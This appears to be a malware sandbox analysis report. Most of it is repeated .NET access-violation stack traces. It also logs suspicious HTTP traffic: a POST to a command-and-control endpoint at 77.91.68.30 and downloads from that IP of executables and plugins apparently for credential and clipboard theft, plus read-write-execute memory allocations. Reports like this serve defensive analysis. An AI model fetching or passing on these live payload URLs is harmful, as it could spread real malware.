__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6d9ba2 0xa6d9549 0xa6d3e4d 0xa6d2aec 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990592 registers.edi: 34990932 registers.eax: 0 registers.ebp: 34990600 registers.edx: 0 registers.ebx: 34993540 registers.esi: 39518432 registers.ecx: 42294008	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6da2b4 0xa6d9d11 0xa6d3e35 0xa6d2bf2 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990624 registers.edi: 34990932 registers.eax: 0 registers.ebp: 34990632 registers.edx: 0 registers.ebx: 34993540 registers.esi: 39518432 registers.ecx: 43687792	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6da2b4 0xa6d9d11 0xa6d3e4d 0xa6d2bf2 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990624 registers.edi: 34990932 registers.eax: 0 registers.ebp: 34990632 registers.edx: 0 registers.ebx: 34993540 registers.esi: 39518432 registers.ecx: 40473752	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6da2b4 0xa6d9d11 0xa6d3e4d 0xa6d2bf2 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990624 registers.edi: 34990932 registers.eax: 0 registers.ebp: 34990632 registers.edx: 0 registers.ebx: 34993540 registers.esi: 39518432 registers.ecx: 41870024	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6db63b 0xa6dabe6 0xa6d18d9 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34991444 registers.edi: 34991708 registers.eax: 0 registers.ebp: 34991452 registers.edx: 0 registers.ebx: 34993540 registers.esi: 42438932 registers.ecx: 42445908	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0x6cd161 0x6ccf63 0x6c7ad8 0x6c72d3 0x6c3c6b 0x6c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6cd298 registers.esp: 2026548 registers.edi: 2026600 registers.eax: 0 registers.ebp: 2026612 registers.edx: 4731792 registers.ebx: 2028052 registers.esi: 43054008 registers.ecx: 0	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa84d28 0xa80c94 0xa8052a 0xa803fd 0x6ceb63 0x6cdcf9 0x6cd9ff 0x6c7c1d 0x6c72d3 0x6c3c6b 0x6c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa84d6b registers.esp: 2025076 registers.edi: 2025420 registers.eax: 0 registers.ebp: 2025084 registers.edx: 0 registers.ebx: 2028052 registers.esi: 43477304 registers.ecx: 44603780	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa84d28 0xa80c94 0xa8052a 0xa80415 0x6ceb63 0x6cdcf9 0x6cd9ff 0x6c7c1d 0x6c72d3 0x6c3c6b 0x6c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa84d6b registers.esp: 2025076 registers.edi: 2025420 registers.eax: 0 registers.ebp: 2025084 registers.edx: 0 registers.ebx: 2028052 registers.esi: 43477304 registers.ecx: 45908488	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa84d28 0xa80c94 0xa8052a 0xa80415 0x6ceb63 0x6cdcf9 0x6cd9ff 0x6c7c1d 0x6c72d3 0x6c3c6b 0x6c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa84d6b registers.esp: 2025076 registers.edi: 2025420 registers.eax: 0 registers.ebp: 2025084 registers.edx: 0 registers.ebx: 2028052 registers.esi: 43477304 registers.ecx: 43332080	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa84d28 0xa85836 0xa850f1 0xa803fd 0x6cee4c 0x6cdcf9 0x6cd9ff 0x6c7c1d 0x6c72d3 0x6c3c6b 0x6c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa84d6b registers.esp: 2025052 registers.edi: 2025444 registers.eax: 0 registers.ebp: 2025060 registers.edx: 0 registers.ebx: 2028052 registers.esi: 42622356 registers.ecx: 44640920	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa84d28 0xa85836 0xa850f1 0xa80415 0x6cee4c 0x6cdcf9 0x6cd9ff 0x6c7c1d 0x6c72d3 0x6c3c6b 0x6c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa84d6b registers.esp: 2025052 registers.edi: 2025444 registers.eax: 0 registers.ebp: 2025060 registers.edx: 0 registers.ebx: 2028052 registers.esi: 42622356 registers.ecx: 45987672	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa84d28 0xa85836 0xa850f1 0xa80415 0x6cee4c 0x6cdcf9 0x6cd9ff 0x6c7c1d 0x6c72d3 0x6c3c6b 0x6c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa84d6b registers.esp: 2025052 registers.edi: 2025444 registers.eax: 0 registers.ebp: 2025060 registers.edx: 0 registers.ebx: 2028052 registers.esi: 42622356 registers.ecx: 47772920	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa84d28 0xa86162 0xa85b09 0xa803fd 0x6cef64 0x6cdcf9 0x6cd9ff 0x6c7c1d 0x6c72d3 0x6c3c6b 0x6c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa84d6b registers.esp: 2025104 registers.edi: 2025444 registers.eax: 0 registers.ebp: 2025112 registers.edx: 0 registers.ebx: 2028052 registers.esi: 42622356 registers.ecx: 42636960	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (5 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.68.30/music/rock/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.30/DSC01491/foto164.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.30/DSC01491/fotod75.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.30/music/rock/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.30/music/rock/Plugins/clip64.dll

Performs some HTTP requests (5 events)

request	POST http://77.91.68.30/music/rock/index.php
request	GET http://77.91.68.30/DSC01491/foto164.exe
request	GET http://77.91.68.30/DSC01491/fotod75.exe
request	GET http://77.91.68.30/music/rock/Plugins/cred64.dll
request	GET http://77.91.68.30/music/rock/Plugins/clip64.dll

Sends data using the HTTP POST Method (1 event)

request

POST http://77.91.68.30/music/rock/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 679 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 1488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 1488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 8:28 a.m.	process_identifier: 2164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
